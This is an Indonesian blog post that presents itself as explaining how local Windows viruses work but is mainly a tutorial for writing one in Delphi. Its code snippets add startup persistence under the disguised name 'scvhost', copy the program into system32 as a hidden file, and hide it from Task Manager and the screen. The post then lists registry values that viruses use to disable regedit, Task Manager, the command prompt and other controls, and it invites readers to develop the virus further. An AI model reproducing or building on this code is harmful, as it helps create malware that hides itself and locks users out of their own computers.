Beranda > Teknologi > Registry Manipulation

Registry Manipulation


virus

Kenapa virus lokal rata-rata menyerang registry? Simple aja, karena windows dapat melakukan fungsinya didukung dengan komponen yang dinamakan dengan registry…registry bisa dikatakan sebagai jantung-nya windows karena di dalam registry ini banyak terisi oleh kumpulan data yang rata-rata berfungsi untuk menngatur windows itu sendiri serta software yang sudah di install.

[ berarti registry tu keren yah ]
Benar sekali, dan ketika kita sudah mengetahui fungsi2 dari nilai registry itu maka kita akan dapat menjadi orang baik atau malah menjadi orang jahat! but semua itu tergantung niatnya ……he..he..he..he

Kita sering bertemu virus-virus lokal, bahkan tidak sedikit virus virus lokal tidak dapat di deteksi oleh antivirus,Untuk itu saya coba kuliti virus lokal ini,

Kalau kita mau menangkap Pencuri kita harus berfikir seolah2 kita seorang pencuri :….Tapi cuma berfikir seolah-olah jadi pencuri…

beberapa teknik2 pembuatan virus dengan Delphi serta nilai-nilai manipulasi registry yang biasa di lakukan oleh virus2 lokal… nanti tergantung niatnya lhooo

CREATE VIRUS WITH DELPHI
Pada pembahasan kali ini kita coba membuat virus sederhana dengan Delphi, dengan catatan tolong jangan di jalankan pada computer teman anda karena dosa itu akan menimpa anda bukan pada penulis.

Delphi dapat digunakan untuk mengakses atau mengganti nilai pada registry windows, langsung aja yah :
Tambahkan uses registry pada klausa uses.
Uses…..,….., registry;
Coba kita buat agar aplikasi kita ini di jalankan ketika computer pertama kali jalan (ini hanya contoh silahkan kembangkan )

Procedure Tform1.FormCreate(Sender: TObject);
var
Reg: TRegistry;
begin
Reg := TRegistry.Create;
try
Reg.RootKey:=HKEY_LOCAL_MACHINE;
reg.OpenKey(‘\Software\Microsoft\Windows\CurrentVersion\Run’,true);
reg.WriteString(‘scvhost’, Application.ExeName);
reg.CloseKey;
finally
reg.free;
end;
end;

 
Simpan project anda kemudian jalankan, jika sudah dijalankan coba restart
dan masuk ke msconfig dan lihat hasilnya. Mudah kan, untuk nilai-nilai yang lain silahkan anda coba sendiri…

Biasanya virus lokal ketika jalan melakukan duplikasi diri ? pake Delphi bisa gak sih? Bisa banget, nah klo
pake delhpi gini caranya :
Misalnya kita pake komponen timer dengan property interval ,maksudnya melakukan proses copy
file tiap X detik

Begin
copyFile(PAnsiChar(’.\’+ExtractFileName(application.ExeName)),’C:\Windows\system32\mangga3.exe’,false);
FileSetAttr(’C:\Windows\mangga3.exe’,faHidden);
end;

Tinggal anda kembangkan yah…. Nilai atribut file dapat juga anda modifikasi ! baca aja di help bawaan
Delphi untuk mengetahi nilai2 apa aja sih yang ada

Biasanya kan virus gak bisa kelihat di task manager ? trus klo di shift+tab juga gak ada trus biasanya aplikasi virus ketika aktif gak kelihatan,
programnya hanya 2 baris kok
Bwt project baru kemudian buka project-nya caranya tekan ctrl+F12 trus pilih projectnya nanti akan muncul seperti tampiln project1 di bawah ini :

program Project1;
uses
Forms,
Unit1 in ‘Unit1.pas’ {Form1};
{$R *.res}
begin
Application.Initialize;
Application.CreateForm(TForm1, Form1);
Application.Run;
end.

Setelah itu kita modifikasi sehingga berubah menjadi :
program Project1;
uses
Forms,
Unit1 in ‘Unit1.pas’ {Form1};
{$R *.res}
begin
Application.Initialize;
Application.Title:=”; //gak kelihatan di task manager
Application.CreateForm(TForm1, Form1);
Application.ShowMainForm:=false; // form utamanya gak kelihatan waktu prosesnya berjalan
Application.Run;
end.

Manipulasi Registry
Manipulasi ini rata-rata dipake pada aplikasi virus.

Disable Registry Editing Tools
User Key: [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\
System]
Name: DisableRegistryTools
Type: REG_DWORD (DWORD Value)
Value: (0 = allow regedit, 1 = disable regedit)

Remove Run from the Start Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoRun
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
Name: IgnoreShiftOveride
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = ignore shift)

Disable Taskbar Context Menus
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoTrayContextMenu
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Hide Start Menu Subfolders
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoStartMenuSubFolders
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = enable restriction)

Remove “All Programs” Button from the Start Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoStartMenuMorePrograms
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = disable button)

Disable the Ability to Right Click on the Desktop
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoViewContextMenu
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Disable Task Scheduler
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices]
Name: SchedulingAgent
Type: REG_SZ (String Value)
Value: mstask.exe

Disable the MS-DOS Command Prompt
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
WinOldApp]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
WinOldApp]
Name: Disabled
Type: REG_DWORD (DWORD Value)
Value: (0 = disable, 1 = enable)

Disable Command Prompt and Batch Files
User Key: [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System]
Name: DisableCMD
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = disabled, 2 = disabled but allow batch)

Run Startup Programs in a Command Prompt
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Command Processor]
Name: AutoRun
Type: REG_SZ (String Value)
Value: Command to Execute
ex:AutoRun REG_SZ “c:\batch\environ.bat”
kalau lebih dari satu maka ”command1 && command2″

Disable TaskManager
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
System]
Name: DisableTaskMgr
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = disable Task Manager)

Specify Executable Files to be Lauched by Winlogon
System Key: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
Name: System
Type: REG_SZ (String Value)
Value: (default = lsass.exe)

Disable Menu Bars and the Start Button
Rename the key by placing a dash “-” in front of the GUID (i.e. {-5b4dae26-b807-11d0-9815-00c04fd91972}).
System Key: [HKEY_CLASSES_ROOT\CLSID\{5b4dae26-b807-11d0-9815-00c04fd91972}]

Hide or Display Administrative Tools Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\
Advanced]
Name: StartMenuAdminTools
Type: REG_SZ (String Value)
Value: Yes or No

Remove the Ability to Right Click on the Start Button (All Windows)
Nilai manipulasi ini akan kelihatan ketika user menekan klik kanan pada tombol start untuk memilih Explore atau Find.

key [HKEY_CLASSES_ROOT\Directory\shell] kemudian nilai ’shell’ ganti menjadi ’shell.old’.
lakukan juga pada
key [HKEY_CLASSES_ROOT\Folder\shell] dan ganti nilainya menjadi […\shell.old].

Hide Control Panel, Printer and Network Settings
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoSetFolders
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Hide the Taskbar Settings on the Start Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoSetTaskbar
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Remove Log Off from the Start Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoLogOff
Type: REG_DWORD (DWORD Value)
Value: (1 = no log off, 0 = show log off)

Disable Drag-and-Drop on the Start Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoChangeStartMenu
Type: REG_DWORD (DWORD Value)
Value: (0 = disable restriction, 1 = enable restriction)

Remove Run from the Start Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoRun
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Remove Search from the Start Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoFind
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Remove Tray Items from Taskbar
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoTrayItemsDisplay
Type: REG_DWORD (DWORD Value)
Value: (0 = default, 1 = enable restriction

Disable the Ability to Right Click on the Desktop
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoViewContextMenu
Type: REG_DWORD (DWORD Value)
Value: (0 = disabled, 1 = enabled)

Disable Folder Options Menu
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoFolderOptions
Type: REG_DWORD (DWORD Value)
Value: (0 = show options, 1 = hide options)

Remove Properties fromMy Computer
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoPropertiesMyComputer
Type: REG_DWORD (DWORD Value)
Value: (0 = Properties, 1 = No Properties)

Hide All Items on the Desktop
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoDesktop
Type: REG_DWORD (DWORD Value)
Value: (0 = disable restriction, 1 = enabled restriction)

Disable the Windows Hotkeys
User Key: [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
System Key: [HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\
Explorer]
Name: NoWinKeys
Type: REG_DWORD (DWORD Value)
Value: (0 = disable restriction, 1 = enable restriction)

Hard Disk Free Space Warning
System Key: [HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\
Parameters]
Name: DiskSpaceThreshold
Type: REG_DWORD (DWORD Value)
Value: 0 – 99 percent (Default is 10)

Mau tau lebih banyak tentang HackRegistry? Coba masuk ke http://www.mdgx.com/

Kategori:Teknologi
  1. Belum ada komentar.
  1. No trackbacks yet.

Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

Logo WordPress.com

You are commenting using your WordPress.com account. Logout / Ubah )

Gambar Twitter

You are commenting using your Twitter account. Logout / Ubah )

Foto Facebook

You are commenting using your Facebook account. Logout / Ubah )

Foto Google+

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

%d blogger menyukai ini: